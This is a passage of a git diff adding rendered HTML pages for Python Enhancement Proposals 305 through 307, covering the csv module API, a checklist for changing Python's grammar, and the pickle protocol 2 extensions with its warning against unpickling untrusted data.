get_dialect() returns the dialect instance associated with the +given name. list_dialects() returns a list of all registered +dialect names. register_dialects() associates a string name with +a dialect class. unregister_dialect() deletes a name/dialect +association.

+
+
+

Formatting Parameters

+

In addition to the dialect argument, both the reader and writer +constructors take several specific formatting parameters, specified as +keyword parameters. The formatting parameters understood are:

+
    +
  • quotechar specifies a one-character string to use as the quoting +character. It defaults to ‘”’. Setting this to None has the same +effect as setting quoting to csv.QUOTE_NONE.
  • +
  • delimiter specifies a one-character string to use as the field +separator. It defaults to ‘,’.
  • +
  • escapechar specifies a one-character string used to escape the +delimiter when quotechar is set to None.
  • +
  • skipinitialspace specifies how to interpret whitespace which +immediately follows a delimiter. It defaults to False, which means +that whitespace immediately following a delimiter is part of the +following field.
  • +
  • lineterminator specifies the character sequence which should +terminate rows.
  • +
  • quoting controls when quotes should be generated by the writer. +It can take on any of the following module constants:
      +
    • csv.QUOTE_MINIMAL means only when required, for example, when a +field contains either the quotechar or the delimiter
    • +
    • csv.QUOTE_ALL means that quotes are always placed around fields.
    • +
    • csv.QUOTE_NONNUMERIC means that quotes are always placed around +nonnumeric fields.
    • +
    • csv.QUOTE_NONE means that quotes are never placed around fields.
    • +
    +
  • +
  • doublequote controls the handling of quotes inside fields. When +True two consecutive quotes are interpreted as one during read, and +when writing, each quote is written as two quotes.
  • +
+

When processing a dialect setting and one or more of the other +optional parameters, the dialect parameter is processed before the +individual formatting parameters. This makes it easy to choose a +dialect, then override one or more of the settings without defining a +new dialect class. For example, if a CSV file was generated by Excel +2000 using single quotes as the quote character and a colon as the +delimiter, you could create a reader like:

+
csvreader = csv.reader(file("some.csv"), dialect="excel",
+                       quotechar="'", delimiter=':')
+
+
+

Other details of how Excel generates CSV files would be handled +automatically because of the reference to the “excel” dialect.

+
+
+

Reader Objects

+

Reader objects are iterables whose next() method returns a sequence of +strings, one string per field in the row.

+
+
+

Writer Objects

+

Writer objects have two methods, writerow() and writerows(). The +former accepts an iterable (typically a list) of fields which are to +be written to the output. The latter accepts a list of iterables and +calls writerow() for each.

+
+
+
+

Implementation

+

There is a sample implementation available. [1] The goal is for it +to efficiently implement the API described in the PEP. It is heavily +based on the Object Craft csv module. [2]

+
+
+

Testing

+

The sample implementation [1] includes a set of test cases.

+
+
+

Issues

+
    +
  1. Should a parameter control how consecutive delimiters are +interpreted? Our thought is “no”. Consecutive delimiters should +always denote an empty field.
  2. +
  3. What about Unicode? Is it sufficient to pass a file object gotten +from codecs.open()? For example:
    csvreader = csv.reader(codecs.open("some.csv", "r", "cp1252"))
    +
    +csvwriter = csv.writer(codecs.open("some.csv", "w", "utf-8"))
    +
    +
    +

    In the first example, text would be assumed to be encoded as cp1252. +Should the system be aggressive in converting to Unicode or should +Unicode strings only be returned if necessary?

    +

    In the second example, the file will take care of automatically +encoding Unicode strings as utf-8 before writing to disk.

    +

    Note: As of this writing, the csv module doesn’t handle Unicode +data.

    +
  4. +
  5. What about alternate escape conventions? If the dialect in use +includes an escapechar parameter which is not None and the +quoting parameter is set to QUOTE_NONE, delimiters appearing +within fields will be prefixed by the escape character when writing +and are expected to be prefixed by the escape character when +reading.
  6. +
  7. Should there be a “fully quoted” mode for writing? What about +“fully quoted except for numeric values”? Both are implemented +(QUOTE_ALL and QUOTE_NONNUMERIC, respectively).
  8. +
  9. What about end-of-line? If I generate a CSV file on a Unix system, +will Excel properly recognize the LF-only line terminators? Files +must be opened for reading or writing as appropriate using binary +mode. Specify the lineterminator sequence as '\r\n'. The +resulting file will be written correctly.
  10. +
  11. What about an option to generate dicts from the reader and accept +dicts by the writer? See the DictReader and DictWriter classes in +csv.py.
  12. +
  13. Are quote character and delimiters limited to single characters? +For the time being, yes.
  14. +
  15. How should rows of different lengths be handled? Interpretation of +the data is the application’s job. There is no such thing as a +“short row” or a “long row” at this level.
  16. +
+
+
+

References

+ +

There are many references to other CSV-related projects on the Web. A +few are included here.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0305.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0306/index.html b/pep-0306/index.html new file mode 100644 index 00000000000..1f82c2d0cd3 --- /dev/null +++ b/pep-0306/index.html @@ -0,0 +1,208 @@ + + + + + + + + PEP 306 – How to Change Python’s Grammar | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 306 – How to Change Python’s Grammar

+
+
Author:
+
Michael Hudson <mwh at python.net>, Jack Diederich <jackdied at gmail.com>, Alyssa Coghlan <ncoghlan at gmail.com>, Benjamin Peterson <benjamin at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
29-Jan-2003
+
Post-History:
+
30-Jan-2003
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been moved to the Python dev guide [1].

+
+
+

Abstract

+

There’s more to changing Python’s grammar than editing +Grammar/Grammar and Python/compile.c. This PEP aims to be a +checklist of places that must also be fixed.

+

It is probably incomplete. If you see omissions, just add them if +you can – you are not going to offend the author’s sense of +ownership. Otherwise submit a bug or patch and assign it to mwh.

+

This PEP is not intended to be an instruction manual on Python +grammar hacking, for several reasons.

+
+
+

Rationale

+

People are getting this wrong all the time; it took well over a +year before someone noticed [2] that adding the floor division +operator (//) broke the parser module.

+
+
+

Checklist

+
    +
  • Grammar/Grammar: OK, you’d probably worked this one out :)
  • +
  • Parser/Python.asdl may need changes to match the Grammar. Run +make to regenerate Include/Python-ast.h and +Python/Python-ast.c.
  • +
  • Python/ast.c will need changes to create the AST objects +involved with the Grammar change. Lib/compiler/ast.py will +need matching changes to the pure-python AST objects.
  • +
  • Parser/pgen needs to be rerun to regenerate Include/graminit.h +and Python/graminit.c. (make should handle this for you.)
  • +
  • Python/symbtable.c: This handles the symbol collection pass +that happens immediately before the compilation pass.
  • +
  • Python/compile.c: You will need to create or modify the +compiler_* functions to generate opcodes for your productions.
  • +
  • You may need to regenerate Lib/symbol.py and/or Lib/token.py +and/or Lib/keyword.py.
  • +
  • The parser module. Add some of your new syntax to test_parser, +bang on Modules/parsermodule.c until it passes.
  • +
  • Add some usage of your new syntax to test_grammar.py.
  • +
  • The compiler package. A good test is to compile the standard +library and test suite with the compiler package and then check +it runs. Note that this only needs to be done in Python 2.x.
  • +
  • If you’ve gone so far as to change the token structure of +Python, then the Lib/tokenizer.py library module will need to +be changed.
  • +
  • Certain changes may require tweaks to the library module +pyclbr.
  • +
  • Documentation must be written!
  • +
  • After everything’s been checked in, you’re likely to see a new +change to Python/Python-ast.c. This is because this +(generated) file contains the SVN version of the source from +which it was generated. There’s no way to avoid this; you just +have to submit this file separately.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0306.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0307/index.html b/pep-0307/index.html new file mode 100644 index 00000000000..b5d394f170a --- /dev/null +++ b/pep-0307/index.html @@ -0,0 +1,904 @@ + + + + + + + + PEP 307 – Extensions to the pickle protocol | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 307 – Extensions to the pickle protocol

+
+
Author:
+
Guido van Rossum, Tim Peters
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
31-Jan-2003
+
Python-Version:
+
2.3
+
Post-History:
+
07-Feb-2003
+
+
+
+
Table of Contents +
+
+

Introduction

+

Pickling new-style objects in Python 2.2 is done somewhat clumsily +and causes pickle size to bloat compared to classic class +instances. This PEP documents a new pickle protocol in Python 2.3 +that takes care of this and many other pickle issues.

+

There are two sides to specifying a new pickle protocol: the byte +stream constituting pickled data must be specified, and the +interface between objects and the pickling and unpickling engines +must be specified. This PEP focuses on API issues, although it +may occasionally touch on byte stream format details to motivate a +choice. The pickle byte stream format is documented formally by +the standard library module pickletools.py (already checked into +CVS for Python 2.3).

+

This PEP attempts to fully document the interface between pickled +objects and the pickling process, highlighting additions by +specifying “new in this PEP”. (The interface to invoke pickling +or unpickling is not covered fully, except for the changes to the +API for specifying the pickling protocol to picklers.)

+
+
+

Motivation

+

Pickling new-style objects causes serious pickle bloat. For +example:

+
class C(object): # Omit "(object)" for classic class
+    pass
+x = C()
+x.foo = 42
+print len(pickle.dumps(x, 1))
+
+
+

The binary pickle for the classic object consumed 33 bytes, and for +the new-style object 86 bytes.

+

The reasons for the bloat are complex, but are mostly caused by +the fact that new-style objects use __reduce__ in order to be +picklable at all. After ample consideration we’ve concluded that +the only way to reduce pickle sizes for new-style objects is to +add new opcodes to the pickle protocol. The net result is that +with the new protocol, the pickle size in the above example is 35 +(two extra bytes are used at the start to indicate the protocol +version, although this isn’t strictly necessary).

+
+
+

Protocol versions

+

Previously, pickling (but not unpickling) distinguished between +text mode and binary mode. By design, binary mode is a +superset of text mode, and unpicklers don’t need to know in +advance whether an incoming pickle uses text mode or binary mode. +The virtual machine used for unpickling is the same regardless of +the mode; certain opcodes simply aren’t used in text mode.

+

Retroactively, text mode is now called protocol 0, and binary mode +protocol 1. The new protocol is called protocol 2. In the +tradition of pickling protocols, protocol 2 is a superset of +protocol 1. But just so that future pickling protocols aren’t +required to be supersets of the oldest protocols, a new opcode is +inserted at the start of a protocol 2 pickle indicating that it is +using protocol 2. To date, each release of Python has been able to +read pickles written by all previous releases. Of course pickles +written under protocol N can’t be read by versions of Python +earlier than the one that introduced protocol N.

+

Several functions, methods and constructors used for pickling used +to take a positional argument named ‘bin’ which was a flag, +defaulting to 0, indicating binary mode. This argument is renamed +to ‘protocol’ and now gives the protocol number, still defaulting +to 0.

+

It so happens that passing 2 for the ‘bin’ argument in previous +Python versions had the same effect as passing 1. Nevertheless, a +special case is added here: passing a negative number selects the +highest protocol version supported by a particular implementation. +This works in previous Python versions, too, and so can be used to +select the highest protocol available in a way that’s both backward +and forward compatible. In addition, a new module constant +HIGHEST_PROTOCOL is supplied by both pickle and cPickle, equal to +the highest protocol number the module can read. This is cleaner +than passing -1, but cannot be used before Python 2.3.

+

The pickle.py module has supported passing the ‘bin’ value as a +keyword argument rather than a positional argument. (This is not +recommended, since cPickle only accepts positional arguments, but +it works…) Passing ‘bin’ as a keyword argument is deprecated, +and a PendingDeprecationWarning is issued in this case. You have +to invoke the Python interpreter with -Wa or a variation on that +to see PendingDeprecationWarning messages. In Python 2.4, the +warning class may be upgraded to DeprecationWarning.

+
+
+

Security issues

+

In previous versions of Python, unpickling would do a “safety +check” on certain operations, refusing to call functions or +constructors that weren’t marked as “safe for unpickling” by +either having an attribute __safe_for_unpickling__ set to 1, or by +being registered in a global registry, copy_reg.safe_constructors.

+

This feature gives a false sense of security: nobody has ever done +the necessary, extensive, code audit to prove that unpickling +untrusted pickles cannot invoke unwanted code, and in fact bugs in +the Python 2.2 pickle.py module make it easy to circumvent these +security measures.

+

We firmly believe that, on the Internet, it is better to know that +you are using an insecure protocol than to trust a protocol to be +secure whose implementation hasn’t been thoroughly checked. Even +high quality implementations of widely used protocols are +routinely found flawed; Python’s pickle implementation simply +cannot make such guarantees without a much larger time investment. +Therefore, as of Python 2.3, all safety checks on unpickling are +officially removed, and replaced with this warning:

+
+

Warning

+

Do not unpickle data received from an untrusted or +unauthenticated source.

+
+

The same warning applies to previous Python versions, despite the +presence of safety checks there.

+
+
+

Extended __reduce__ API

+

There are several APIs that a class can use to control pickling. +Perhaps the most popular of these are __getstate__ and +__setstate__; but the most powerful one is __reduce__. (There’s +also __getinitargs__, and we’re adding __getnewargs__ below.)

+

There are several ways to provide __reduce__ functionality: a +class can implement a __reduce__ method or a __reduce_ex__ method +(see next section), or a reduce function can be declared in +copy_reg (copy_reg.dispatch_table maps classes to functions). The +return values are interpreted exactly the same, though, and we’ll +refer to these collectively as __reduce__.

+

Important: pickling of classic class instances does not look for a +__reduce__ or __reduce_ex__ method or a reduce function in the +copy_reg dispatch table, so that a classic class cannot provide +__reduce__ functionality in the sense intended here. A classic +class must use __getinitargs__ and/or __getstate__ to customize +pickling. These are described below.

+

__reduce__ must return either a string or a tuple. If it returns +a string, this is an object whose state is not to be pickled, but +instead a reference to an equivalent object referenced by name. +Surprisingly, the string returned by __reduce__ should be the +object’s local name (relative to its module); the pickle module +searches the module namespace to determine the object’s module.

+

The rest of this section is concerned with the tuple returned by +__reduce__. It is a variable size tuple, of length 2 through 5. +The first two items (function and arguments) are required. The +remaining items are optional and may be left off from the end; +giving None for the value of an optional item acts the same as +leaving it off. The last two items are new in this PEP. The items +are, in order:

+ + + + + + + + + +
functionRequired.

A callable object (not necessarily a function) called +to create the initial version of the object; state +may be added to the object later to fully reconstruct +the pickled state. This function must itself be +picklable. See the section about __newobj__ for a +special case (new in this PEP) here.

+
argumentsRequired.

A tuple giving the argument list for the function. +As a special case, designed for Zope 2’s +ExtensionClass, this may be None; in that case, +function should be a class or type, and +function.__basicnew__() is called to create the +initial version of the object. This exception is +deprecated.

+
+

Unpickling invokes function(*arguments) to create an initial object, +called obj below. If the remaining items are left off, that’s the end +of unpickling for this object and obj is the result. Else obj is +modified at unpickling time by each item specified, as follows.

+ + + + + + + + + + + + +
stateOptional.

Additional state. If this is not None, the state is +pickled, and obj.__setstate__(state) will be called +when unpickling. If no __setstate__ method is +defined, a default implementation is provided, which +assumes that state is a dictionary mapping instance +variable names to their values. The default +implementation calls

+
obj.__dict__.update(state)
+
+
+

or, if the update() call fails,

+
for k, v in state.items():
+    setattr(obj, k, v)
+
+
+
listitemsOptional, and new in this PEP.

If this is not None, it should be an iterator (not a +sequence!) yielding successive list items. These list +items will be pickled, and appended to the object using +either obj.append(item) or obj.extend(list_of_items). +This is primarily used for list subclasses, but may +be used by other classes as long as they have append() +and extend() methods with the appropriate signature. +(Whether append() or extend() is used depends on which +pickle protocol version is used as well as the number +of items to append, so both must be supported.)

+
dictitemsOptional, and new in this PEP.

If this is not None, it should be an iterator (not a +sequence!) yielding successive dictionary items, which +should be tuples of the form (key, value). These items +will be pickled, and stored to the object using +obj[key] = value. This is primarily used for dict +subclasses, but may be used by other classes as long +as they implement __setitem__.

+
+

Note: in Python 2.2 and before, when using cPickle, state would be +pickled if present even if it is None; the only safe way to avoid +the __setstate__ call was to return a two-tuple from __reduce__. +(But pickle.py would not pickle state if it was None.) In Python +2.3, __setstate__ will never be called at unpickling time when +__reduce__ returns a state with value None at pickling time.

+

A __reduce__ implementation that needs to work both under Python +2.2 and under Python 2.3 could check the variable +pickle.format_version to determine whether to use the listitems +and dictitems features. If this value is >= "2.0" then they are +supported. If not, any list or dict items should be incorporated +somehow in the ‘state’ return value, and the __setstate__ method +should be prepared to accept list or dict items as part of the +state (how this is done is up to the application).

+
+
+

The __reduce_ex__ API

+

It is sometimes useful to know the protocol version when +implementing __reduce__. This can be done by implementing a +method named __reduce_ex__ instead of __reduce__. __reduce_ex__, +when it exists, is called in preference over __reduce__ (you may +still provide __reduce__ for backwards compatibility). The +__reduce_ex__ method will be called with a single integer +argument, the protocol version.

+

The ‘object’ class implements both __reduce__ and __reduce_ex__; +however, if a subclass overrides __reduce__ but not __reduce_ex__, +the __reduce_ex__ implementation detects this and calls +__reduce__.

+
+
+

Customizing pickling absent a __reduce__ implementation

+

If no __reduce__ implementation is available for a particular +class, there are three cases that need to be considered +separately, because they are handled differently:

+
    +
  1. classic class instances, all protocols
  2. +
  3. new-style class instances, protocols 0 and 1
  4. +
  5. new-style class instances, protocol 2
  6. +
+

Types implemented in C are considered new-style classes. However, +except for the common built-in types, these need to provide a +__reduce__ implementation in order to be picklable with protocols +0 or 1. Protocol 2 supports built-in types providing +__getnewargs__, __getstate__ and __setstate__ as well.

+
+

Case 1: pickling classic class instances

+

This case is the same for all protocols, and is unchanged from +Python 2.1.

+

For classic classes, __reduce__ is not used. Instead, classic +classes can customize their pickling by providing methods named +__getstate__, __setstate__ and __getinitargs__. Absent these, a +default pickling strategy for classic class instances is +implemented that works as long as all instance variables are +picklable. This default strategy is documented in terms of +default implementations of __getstate__ and __setstate__.

+

The primary ways to customize pickling of classic class instances +is by specifying __getstate__ and/or __setstate__ methods. It is +fine if a class implements one of these but not the other, as long +as it is compatible with the default version.

+
+

The __getstate__ method

+

The __getstate__ method should return a picklable value +representing the object’s state without referencing the object +itself. If no __getstate__ method exists, a default +implementation is used that returns self.__dict__.

+
+
+

The __setstate__ method

+

The __setstate__ method should take one argument; it will be +called with the value returned by __getstate__ (or its default +implementation).

+

If no __setstate__ method exists, a default implementation is +provided that assumes the state is a dictionary mapping instance +variable names to values. The default implementation tries two +things:

+
    +
  • First, it tries to call self.__dict__.update(state).
  • +
  • If the update() call fails with a RuntimeError exception, it +calls setattr(self, key, value) for each (key, value) pair in +the state dictionary. This only happens when unpickling in +restricted execution mode (see the rexec standard library +module).
  • +
+
+
+

The __getinitargs__ method

+

The __setstate__ method (or its default implementation) requires +that a new object already exists so that its __setstate__ method +can be called. The point is to create a new object that isn’t +fully initialized; in particular, the class’s __init__ method +should not be called if possible.

+

These are the possibilities:

+
    +
  • Normally, the following trick is used: create an instance of a +trivial classic class (one without any methods or instance +variables) and then use __class__ assignment to change its +class to the desired class. This creates an instance of the +desired class with an empty __dict__ whose __init__ has not +been called.
  • +
  • However, if the class has a method named __getinitargs__, the +above trick is not used, and a class instance is created by +using the tuple returned by __getinitargs__ as an argument +list to the class constructor. This is done even if +__getinitargs__ returns an empty tuple — a __getinitargs__ +method that returns () is not equivalent to not having +__getinitargs__ at all. __getinitargs__ must return a +tuple.
  • +
  • In restricted execution mode, the trick from the first bullet +doesn’t work; in this case, the class constructor is called +with an empty argument list if no __getinitargs__ method +exists. This means that in order for a classic class to be +unpicklable in restricted execution mode, it must either +implement __getinitargs__ or its constructor (i.e., its +__init__ method) must be callable without arguments.
  • +
+
+
+
+

Case 2: pickling new-style class instances using protocols 0 or 1

+

This case is unchanged from Python 2.2. For better pickling of +new-style class instances when backwards compatibility is not an +issue, protocol 2 should be used; see case 3 below.

+

New-style classes, whether implemented in C or in Python, inherit +a default __reduce__ implementation from the universal base class +‘object’.

+

This default __reduce__ implementation is not used for those +built-in types for which the pickle module has built-in support. +Here’s a full list of those types:

+
    +
  • Concrete built-in types: NoneType, bool, int, float, complex, +str, unicode, tuple, list, dict. (Complex is supported by +virtue of a __reduce__ implementation registered in copy_reg.) +In Jython, PyStringMap is also included in this list.
  • +
  • Classic instances.
  • +
  • Classic class objects, Python function objects, built-in +function and method objects, and new-style type objects (== +new-style class objects). These are pickled by name, not by +value: at unpickling time, a reference to an object with the +same name (the fully qualified module name plus the variable +name in that module) is substituted.
  • +
+

The default __reduce__ implementation will fail at pickling time +for built-in types not mentioned above, and for new-style classes +implemented in C: if they want to be picklable, they must supply +a custom __reduce__ implementation under protocols 0 and 1.

+

For new-style classes implemented in Python, the default +__reduce__ implementation (copy_reg._reduce) works as follows:

+

Let D be the class on the object to be pickled. First, find the +nearest base class that is implemented in C (either as a +built-in type or as a type defined by an extension class). Call +this base class B, and the class of the object to be pickled D. +Unless B is the class ‘object’, instances of class B must be +picklable, either by having built-in support (as defined in the +above three bullet points), or by having a non-default +__reduce__ implementation. B must not be the same class as D +(if it were, it would mean that D is not implemented in Python).

+

The callable produced by the default __reduce__ is +copy_reg._reconstructor, and its arguments tuple is +(D, B, basestate), where basestate is None if B is the builtin +object class, and basestate is

+
basestate = B(obj)
+
+
+

if B is not the builtin object class. This is geared toward +pickling subclasses of builtin types, where, for example, +list(some_list_subclass_instance) produces “the list part” of +the list subclass instance.

+

The object is recreated at unpickling time by +copy_reg._reconstructor, like so:

+
obj = B.__new__(D, basestate)
+B.__init__(obj, basestate)
+
+
+

Objects using the default __reduce__ implementation can customize +it by defining __getstate__ and/or __setstate__ methods. These +work almost the same as described for classic classes above, except +that if __getstate__ returns an object (of any type) whose value is +considered false (e.g. None, or a number that is zero, or an empty +sequence or mapping), this state is not pickled and __setstate__ +will not be called at all. If __getstate__ exists and returns a +true value, that value becomes the third element of the tuple +returned by the default __reduce__, and at unpickling time the +value is passed to __setstate__. If __getstate__ does not exist, +but obj.__dict__ exists, then obj.__dict__ becomes the third +element of the tuple returned by __reduce__, and again at +unpickling time the value is passed to obj.__setstate__. The +default __setstate__ is the same as that for classic classes, +described above.

+

Note that this strategy ignores slots. Instances of new-style +classes that have slots but no __getstate__ method cannot be +pickled by protocols 0 and 1; the code explicitly checks for +this condition.

+

Note that pickling new-style class instances ignores __getinitargs__ +if it exists (and under all protocols). __getinitargs__ is +useful only for classic classes.

+
+
+

Case 3: pickling new-style class instances using protocol 2

+

Under protocol 2, the default __reduce__ implementation inherited +from the ‘object’ base class is ignored. Instead, a different +default implementation is used, which allows more efficient +pickling of new-style class instances than possible with protocols +0 or 1, at the cost of backward incompatibility with Python 2.2 +(meaning no more than that a protocol 2 pickle cannot be unpickled +before Python 2.3).

+

The customization uses three special methods: __getstate__, +__setstate__ and __getnewargs__ (note that __getinitargs__ is again +ignored). It is fine if a class implements one or more but not all +of these, as long as it is compatible with the default +implementations.

+
+

The __getstate__ method

+

The __getstate__ method should return a picklable value +representing the object’s state without referencing the object +itself. If no __getstate__ method exists, a default +implementation is used which is described below.

+

There’s a subtle difference between classic and new-style +classes here: if a classic class’s __getstate__ returns None, +self.__setstate__(None) will be called as part of unpickling. +But if a new-style class’s __getstate__ returns None, its +__setstate__ won’t be called at all as part of unpickling.

+

If no __getstate__ method exists, a default state is computed. +There are several cases:

+
    +
  • For a new-style class that has no instance __dict__ and no +__slots__, the default state is None.
  • +
  • For a new-style class that has an instance __dict__ and no +__slots__, the default state is self.__dict__.
  • +
  • For a new-style class that has an instance __dict__ and +__slots__, the default state is a tuple consisting of two +dictionaries: self.__dict__, and a dictionary mapping slot +names to slot values. Only slots that have a value are +included in the latter.
  • +
  • For a new-style class that has __slots__ and no instance +__dict__, the default state is a tuple whose first item is +None and whose second item is a dictionary mapping slot names +to slot values described in the previous bullet.
  • +
+
+
+

The __setstate__ method

+

The __setstate__ method should take one argument; it will be +called with the value returned by __getstate__ or with the +default state described above if no __getstate__ method is +defined.

+

If no __setstate__ method exists, a default implementation is +provided that can handle the state returned by the default +__getstate__, described above.

+
+
+

The __getnewargs__ method

+

Like for classic classes, the __setstate__ method (or its +default implementation) requires that a new object already +exists so that its __setstate__ method can be called.

+

In protocol 2, a new pickling opcode is used that causes a new +object to be created as follows:

+
obj = C.__new__(C, *args)
+
+
+

where C is the class of the pickled object, and args is either +the empty tuple, or the tuple returned by the __getnewargs__ +method, if defined. __getnewargs__ must return a tuple. The +absence of a __getnewargs__ method is equivalent to the existence +of one that returns ().

+
+
+
+
+

The __newobj__ unpickling function

+

When the unpickling function returned by __reduce__ (the first +item of the returned tuple) has the name __newobj__, something +special happens for pickle protocol 2. An unpickling function +named __newobj__ is assumed to have the following semantics:

+
def __newobj__(cls, *args):
+    return cls.__new__(cls, *args)
+
+
+

Pickle protocol 2 special-cases an unpickling function with this +name, and emits a pickling opcode that, given ‘cls’ and ‘args’, +will return cls.__new__(cls, *args) without also pickling a +reference to __newobj__ (this is the same pickling opcode used by +protocol 2 for a new-style class instance when no __reduce__ +implementation exists). This is the main reason why protocol 2 +pickles are much smaller than classic pickles. Of course, the +pickling code cannot verify that a function named __newobj__ +actually has the expected semantics. If you use an unpickling +function named __newobj__ that returns something different, you +deserve what you get.

+

It is safe to use this feature under Python 2.2; there’s nothing +in the recommended implementation of __newobj__ that depends on +Python 2.3.

+
+
+

The extension registry

+

Protocol 2 supports a new mechanism to reduce the size of pickles.

+

When class instances (classic or new-style) are pickled, the full +name of the class (module name including package name, and class +name) is included in the pickle. Especially for applications that +generate many small pickles, this is a lot of overhead that has to +be repeated in each pickle. For large pickles, when using +protocol 1, repeated references to the same class name are +compressed using the “memo” feature; but each class name must be +spelled in full at least once per pickle, and this causes a lot of +overhead for small pickles.

+

The extension registry allows one to represent the most frequently +used names by small integers, which are pickled very efficiently: +an extension code in the range 1–255 requires only two bytes +including the opcode, one in the range 256–65535 requires only +three bytes including the opcode.

+

One of the design goals of the pickle protocol is to make pickles +“context-free”: as long as you have installed the modules +containing the classes referenced by a pickle, you can unpickle +it, without needing to import any of those classes ahead of time.

+

Unbridled use of extension codes could jeopardize this desirable +property of pickles. Therefore, the main use of extension codes +is reserved for a set of codes to be standardized by some +standard-setting body. This being Python, the standard-setting +body is the PSF. From time to time, the PSF will decide on a +table mapping extension codes to class names (or occasionally +names of other global objects; functions are also eligible). This +table will be incorporated in the next Python release(s).

+

However, for some applications, like Zope, context-free pickles +are not a requirement, and waiting for the PSF to standardize +some codes may not be practical. Two solutions are offered for +such applications.

+

First, a few ranges of extension codes are reserved for private +use. Any application can register codes in these ranges. +Two applications exchanging pickles using codes in these ranges +need to have some out-of-band mechanism to agree on the mapping +between extension codes and names.

+

Second, some large Python projects (e.g. Zope) can be assigned a +range of extension codes outside the “private use” range that they +can assign as they see fit.

+

The extension registry is defined as a mapping between extension +codes and names. When an extension code is unpickled, it ends up +producing an object, but this object is gotten by interpreting the +name as a module name followed by a class (or function) name. The +mapping from names to objects is cached. It is quite possible +that certain names cannot be imported; that should not be a +problem as long as no pickle containing a reference to such names +has to be unpickled. (The same issue already exists for direct +references to such names in pickles that use protocols 0 or 1.)

+

Here is the proposed initial assignment of extension code ranges:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
FirstLastCountPurpose
001Reserved — will never be used
1127127Reserved for Python standard library
12819164Reserved for Zope
19223948Reserved for 3rd parties
24025516Reserved for private use (will never be assigned)
256MAXMAXReserved for future assignment
+

MAX stands for 2147483647, or 2**31-1. This is a hard limitation +of the protocol as currently defined.

+

At the moment, no specific extension codes have been assigned yet.

+
+

Extension registry API

+

The extension registry is maintained as private global variables +in the copy_reg module. The following three functions are defined +in this module to manipulate the registry:

+
+
add_extension(module, name, code)
Register an extension code. The module and name arguments +must be strings; code must be an int in the inclusive range 1 +through MAX. This must either register a new (module, name) +pair to a new code, or be a redundant repeat of a previous +call that was not canceled by a remove_extension() call; a +(module, name) pair may not be mapped to more than one code, +nor may a code be mapped to more than one (module, name) +pair.
+
remove_extension(module, name, code)
Arguments are as for add_extension(). Remove a previously +registered mapping between (module, name) and code.
+
clear_extension_cache()
The implementation of extension codes may use a cache to speed +up loading objects that are named frequently. This cache can +be emptied (removing references to cached objects) by calling +this method.
+
+

Note that the API does not enforce the standard range assignments. +It is up to applications to respect these.

+
+
+
+

The copy module

+

Traditionally, the copy module has supported an extended subset of +the pickling APIs for customizing the copy() and deepcopy() +operations.

+

In particular, besides checking for a __copy__ or __deepcopy__ +method, copy() and deepcopy() have always looked for __reduce__, +and for classic classes, have looked for __getinitargs__, +__getstate__ and __setstate__.

+

In Python 2.2, the default __reduce__ inherited from ‘object’ made +copying simple new-style classes possible, but slots and various +other special cases were not covered.

+

In Python 2.3, several changes are made to the copy module:

+
    +
  • __reduce_ex__ is supported (and always called with 2 as the +protocol version argument).
  • +
  • The four- and five-argument return values of __reduce__ are +supported.
  • +
  • Before looking for a __reduce__ method, the +copy_reg.dispatch_table is consulted, just like for pickling.
  • +
  • When the __reduce__ method is inherited from object, it is +(unconditionally) replaced by a better one that uses the same +APIs as pickle protocol 2: __getnewargs__, __getstate__, and +__setstate__, handling list and dict subclasses, and handling +slots.
  • +
+

As a consequence of the latter change, certain new-style classes +that were copyable under Python 2.2 are not copyable under Python +2.3. (These classes are also not picklable using pickle protocol +2.) A minimal example of such a class:

+
class C(object):
+    def __new__(cls, a):
+        return object.__new__(cls)
+
+
+

The problem only occurs when __new__ is overridden and has at +least one mandatory argument in addition to the class argument.

+

To fix this, a __getnewargs__ method should be added that returns +the appropriate argument tuple (excluding the class).

+
+
+

Pickling Python longs

+

Pickling and unpickling Python longs takes time quadratic in +the number of digits, in protocols 0 and 1. Under protocol 2, +new opcodes support linear-time pickling and unpickling of longs.

+
+
+

Pickling bools

+

Protocol 2 introduces new opcodes for pickling True and False +directly. Under protocols 0 and 1, bools are pickled as integers, +using a trick in the representation of the integer in the pickle +so that an unpickler can recognize that a bool was intended. That +trick consumed 4 bytes per bool pickled. The new bool opcodes +consume 1 byte per bool.

+
+
+

Pickling small tuples

+

Protocol 2 introduces new opcodes for more-compact pickling of +tuples of lengths 1, 2 and 3. Protocol 1 previously introduced +an opcode for more-compact pickling of empty tuples.

+
+
+

Protocol identification

+

Protocol 2 introduces a new opcode, with which all protocol 2 +pickles begin, identifying that the pickle is protocol 2. +Attempting to unpickle a protocol 2 pickle under older versions +of Python will therefore raise an “unknown opcode” exception +immediately.

+
+
+

Pickling of large lists and dicts

+

Protocol 1 pickles large lists and dicts “in one piece”, which +minimizes pickle size, but requires that unpickling create a temp +object as large as the object being unpickled. Part of the +protocol 2 changes break large lists and dicts into pieces of no +more than 1000 elements each, so that unpickling needn’t create +a temp object larger than needed to hold 1000 elements. This +isn’t part of protocol 2, however: the opcodes produced are still +part of protocol 1. __reduce__ implementations that return the +optional new listitems or dictitems iterators also benefit from +this unpickling temp-space optimization.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0307.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
